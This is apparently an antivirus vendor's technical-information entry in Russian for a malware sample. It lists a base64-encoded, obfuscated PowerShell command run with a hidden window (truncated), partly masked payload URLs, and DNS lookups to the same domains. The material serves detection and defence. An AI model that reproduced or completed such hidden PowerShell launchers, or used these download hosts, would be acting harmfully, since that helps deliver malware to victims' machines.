Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...
- http://ri####ewelder.com/dtbkup20110205/i/
- http://tf###ru.com.br/cgi-bin/Lhe/
- http://th####estgeek.com/error/FS/
- http://www.th####estgeek.com/error/FS/
- http://un###ewv.com/cgi-bin/OVJ9qY/
- http://www.un###ewv.com/cgi-bin/OVJ9qY/
- http://tu#s.pl/cgi-bin/7a9/
- http://tu#s.pl/cgi-bin/7a9
- DNS ASK ri####ewelder.com
- DNS ASK si###gps.com
- DNS ASK tf###ru.com.br
- DNS ASK pa#####kphotography.com
- DNS ASK th####estgeek.com
- DNS ASK un###ewv.com
- DNS ASK tu#s.pl
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABFAHgAcwB4AGEAMgA5AD0AKAAoACcAUwBrAF8AbwAnACsAJwBfADMAJwApACsAJwByACcAKQA7ACYAKAAnAG4AZQB3AC0AJwArACcAaQB0AGUAJwArACcAbQAnACkAIAAkAEUATgBWADoAdABFAE0AcABcAFcAbwByAGQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)